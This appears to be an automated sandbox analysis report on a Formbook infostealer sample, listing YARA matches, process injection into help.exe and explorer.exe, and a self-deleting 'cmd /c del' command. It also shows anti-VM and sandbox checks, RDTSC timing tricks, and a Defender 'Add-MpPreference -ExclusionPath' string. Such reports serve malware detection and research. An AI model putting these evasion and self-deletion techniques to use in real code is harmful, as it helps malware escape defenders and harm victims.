          Source: 4.0.SKlGhwkzTi.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.SKlGhwkzTi.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.SKlGhwkzTi.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.SKlGhwkzTi.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.SKlGhwkzTi.exe.3de9930.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.SKlGhwkzTi.exe.3de9930.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: SKlGhwkzTi.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/1@8/7
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SKlGhwkzTi.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6932:120:WilError_01
          Source: SKlGhwkzTi.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: SKlGhwkzTi.exe, 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
          Source: SKlGhwkzTi.exe, 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: SKlGhwkzTi.exe, 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
          Source: SKlGhwkzTi.exe, 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
          Source: SKlGhwkzTi.exe, 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: SKlGhwkzTi.exe, 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: SKlGhwkzTi.exe, 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: SKlGhwkzTi.exe, 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
          Source: SKlGhwkzTi.exe, 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
          Source: SKlGhwkzTi.exeVirustotal: Detection: 31%
          Source: SKlGhwkzTi.exeReversingLabs: Detection: 41%
          Source: SKlGhwkzTi.exeString found in binary or memory: -start_number {0} -i "{1}{2}"
          Source: SKlGhwkzTi.exeString found in binary or memory: <!--StartFragment -->
          Source: SKlGhwkzTi.exeString found in binary or memory: -start_number {0} -i "{1}{2}"
          Source: SKlGhwkzTi.exeString found in binary or memory: <!--StartFragment -->
          Source: SKlGhwkzTi.exeString found in binary or memory: <<<<<<<3+<!--StartFragment -->
          Source: SKlGhwkzTi.exeString found in binary or memory: %0{0}d;-start_number {0} -i "{1}{2}"
          Source: unknownProcess created: C:\Users\user\Desktop\SKlGhwkzTi.exe 'C:\Users\user\Desktop\SKlGhwkzTi.exe'
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess created: C:\Users\user\Desktop\SKlGhwkzTi.exe C:\Users\user\Desktop\SKlGhwkzTi.exe
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\SKlGhwkzTi.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess created: C:\Users\user\Desktop\SKlGhwkzTi.exe C:\Users\user\Desktop\SKlGhwkzTi.exe
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\SKlGhwkzTi.exe'
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: SKlGhwkzTi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: SKlGhwkzTi.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000000.700218908.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: SKlGhwkzTi.exe, 00000004.00000002.764137531.000000000195F000.00000040.00000001.sdmp, help.exe, 0000000D.00000002.918935858.00000000039A0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: SKlGhwkzTi.exe, help.exe
          Source: Binary string: help.pdbGCTL source: SKlGhwkzTi.exe, 00000004.00000002.763881170.0000000001830000.00000040.00000001.sdmp
          Source: Binary string: help.pdb source: SKlGhwkzTi.exe, 00000004.00000002.763881170.0000000001830000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000006.00000000.700218908.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 0_2_014D9990 pushfd ; retf
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 0_2_014D65C8 push esp; retf
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 0_2_014DAC51 pushfd ; retf
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 0_2_014DACF1 pushfd ; retf
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 0_2_014DACAC push eax; iretd
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 0_2_014DACA8 pushfd ; retf
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 0_2_014DACA0 pushfd ; retf
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 0_2_014D55E8 push esp; retf 0002h
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 0_2_014D3788 push eax; retf
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 0_2_02C3232D push FFFFFF8Bh; iretd
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 0_2_052BA992 pushad ; retf
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0041B2A2 push cs; ret
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0041B3F2 push eax; ret
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0041B3FB push eax; ret
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0041B3A5 push eax; ret
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0041B45C push eax; ret
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_00415414 push esp; ret
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_00414F46 push cs; ret
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0041BF12 push dword ptr [8427D5C5h]; ret
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_00415FC5 push ebp; ret
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018BD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A1D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032FB3A5 push eax; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032FB3FB push eax; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032FB3F2 push eax; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032FB2A2 push cs; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032FBF12 push dword ptr [8427D5C5h]; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032F4F46 push cs; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032F5FC5 push ebp; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032F5414 push esp; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032FB45C push eax; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.59789627336
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: SKlGhwkzTi.exe PID: 6896, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: SKlGhwkzTi.exe, 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: SKlGhwkzTi.exe, 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 00000000032E85E4 second address: 00000000032E85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 00000000032E896E second address: 00000000032E8974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exe TID: 6900Thread sleep time: -103480s >= -30000s
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exe TID: 6948Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\help.exe TID: 3120Thread sleep time: -38000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeThread delayed: delay time: 103480
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000006.00000000.706696633.000000000A9A1000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.698375339.0000000004791000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATA
          Source: explorer.exe, 00000006.00000000.700072671.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000006.00000000.704598471.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: SKlGhwkzTi.exe, 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: SKlGhwkzTi.exe, 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: SKlGhwkzTi.exe, 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000006.00000000.700611112.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.704598471.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: SKlGhwkzTi.exe, 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: SKlGhwkzTi.exe, 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: SKlGhwkzTi.exe, 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000006.00000000.725511730.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000006.00000000.700072671.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000006.00000000.704737422.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000006.00000000.700072671.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: SKlGhwkzTi.exe, 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: SKlGhwkzTi.exe, 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 00000006.00000000.704801923.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: SKlGhwkzTi.exe, 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000006.00000000.700072671.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\help.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_00409B10 LdrLoadDll,
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0188C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01892990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018961A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018961A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_019249A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_019249A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_019249A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_019249A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018F41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0186B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0186B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0186B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01869100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01869100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01869100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01884120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01884120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01884120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01884120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01884120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0188B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0188B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0186C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0186B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0186B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01869080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018FB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018640E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018640E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018640E1 mov eax, dword ptr fs:[00000030h]
